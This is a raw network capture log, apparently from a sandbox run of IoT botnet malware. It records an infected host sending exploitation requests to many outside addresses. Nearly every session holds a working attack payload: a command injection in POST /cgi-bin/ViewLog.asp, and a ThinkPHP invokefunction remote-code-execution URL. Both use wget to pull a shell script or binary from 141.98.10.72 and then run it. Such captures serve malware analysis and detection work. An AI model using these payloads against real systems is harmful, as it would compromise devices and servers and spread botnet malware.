                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:28.302700996 CET313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1087192.168.2.143888231.136.253.928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:29.040860891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:32.195132971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:38.338936090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.370321035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:15.457324028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1088192.168.2.145070662.29.108.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:29.083148956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1089192.168.2.144406285.74.216.2538080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:29.083199978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1090192.168.2.145934894.120.0.678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:29.085309029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1091192.168.2.144348894.124.165.738080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:29.131746054 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1092192.168.2.145289694.101.187.1528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:29.619781971 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:29.913892984 CET205INHTTP/1.1 501 Unsupported method ('POST')
                                                        Server: WebSockify Python/3.6.9
                                                        Date: Wed, 14 Feb 2024 08:35:29 GMT
                                                        Connection: close
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 497


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1093192.168.2.144188431.136.185.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:30.050299883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:33.218950987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:39.362729073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:51.394210100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:15.457227945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1094192.168.2.144542695.165.128.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:30.058717966 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1095192.168.2.144377894.122.4.2558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:30.498753071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1096192.168.2.1445064112.223.82.20680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.016581059 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.328695059 CET1286INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:35:27 GMT
                                                        Server: Apache/2.2.15 (Fedora)
                                                        Last-Modified: Wed, 20 Mar 2013 06:54:02 GMT
                                                        ETag: "79f1-761-4d855afe9d680"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1889
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e2 96 92 e2 96 92 e2 96 92 e2 96 92 e2 96 92 20 ec b0 a8 eb 8b a8 eb 90 9c 20 ed 8e 98 ec 9d b4 ec a7 80 20 e2 96 92 e2 96 92 e2 96 92 e2 96 92 e2 96 92 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 65 66 74 6d 61 72 67 69 6e 3d 22 30 22 20 74 6f 70 6d 61 72 67 69 6e 3d 22 30 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 62 67 63 6f 6c 6f 72 3d 22 23 45 36 45 36 45 36 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 20 0a 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 34 32 32 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 61 67 65 5f 65 30 31 2e 67 69 66 22 20 77 69 64 74 68 3d 22 34 32 32 22 20 68 65 69 67 68 74 3d 22 36 30 22 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 61 67 65 5f 65 30 32 2e 67 69 66 22 20 77 69 64 74 68 3d 22 34 32 32 22 20 68 65 69 67 68 74 3d 22 33 36 22 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 62 61 63 6b 67 72 6f 75 6e 64 3d 22 2f 69 6d 61 67 65 73 2f 70 61 67 65 5f 65 62 67 2e 67 69 66 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 33 39 37 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 68 65 69 67 68 74 3d 22 35 30 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 27 66 6f 6e 74 3a 31 30 70 74 20 47 65 6f 72 67 69 61 3b 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e ec 9a 94 ec b2 ad ed 95 98 ec 8b a0 20 ed 8e 98 ec 9d b4 ec a7 80 eb 8a 94 20 eb b0 a9 ed 99 94 eb b2 bd ec 97 90 20 ec 9d 98 ed 95 b4 ec 84 9c 20 ec b0 a8 eb 8b a8 eb 90 98 ec 97 88 ec 8a b5 eb 8b 88 eb 8b a4 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e ea b4 80 eb a6 ac ec 9e 90 ec 97 90 ea b2 8c 20 eb ac b8 ec 9d 98 20 eb b6 80 ed
                                                        Data Ascii: <html><head><title> </title></head><body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><table width="100%%" border="0" cellspacing="0" cellpadding="0" height="100%%"> <tr> <td bgcolor="#E6E6E6" align="center"> <table width="422" border="0" cellspacing="0" cellpadding="0"> <tr><td><img src="/images/page_e01.gif" width="422" height="60"></td></tr> <tr><td><img src="/images/page_e02.gif" width="422" height="36"></td></tr> <tr> <td background="/images/page_ebg.gif" align="center" bgcolor="#FFFFFF"> <table width="397" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="50" align="center" style='font:10pt Georgia;'> <p>&nbsp;</p> <p> .</p> <p>
                                                        Feb 14, 2024 09:35:31.329026937 CET903INData Raw: 83 81 20 eb 93 9c eb a6 bd eb 8b 88 eb 8b a4 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20
                                                        Data Ascii: .</p> <p>&nbsp;</p> </td> </tr> <tr> <td height="40" align="left" style='font:9pt Georgia;color=blue'> <p>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1097192.168.2.144204495.101.162.9980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.184051991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.350140095 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 62 34 64 64 62 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 31 26 23 34 36 3b 34 35 33 61 33 32 34 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8b4ddb17&#46;1707899731&#46;453a3246</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1098192.168.2.144157095.100.79.13880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.220127106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.422545910 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 30 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 31 26 23 34 36 3b 34 66 36 30 35 61 31 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;907a7b5c&#46;1707899731&#46;4f605a13</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1099192.168.2.143999495.0.60.4680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.261409998 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
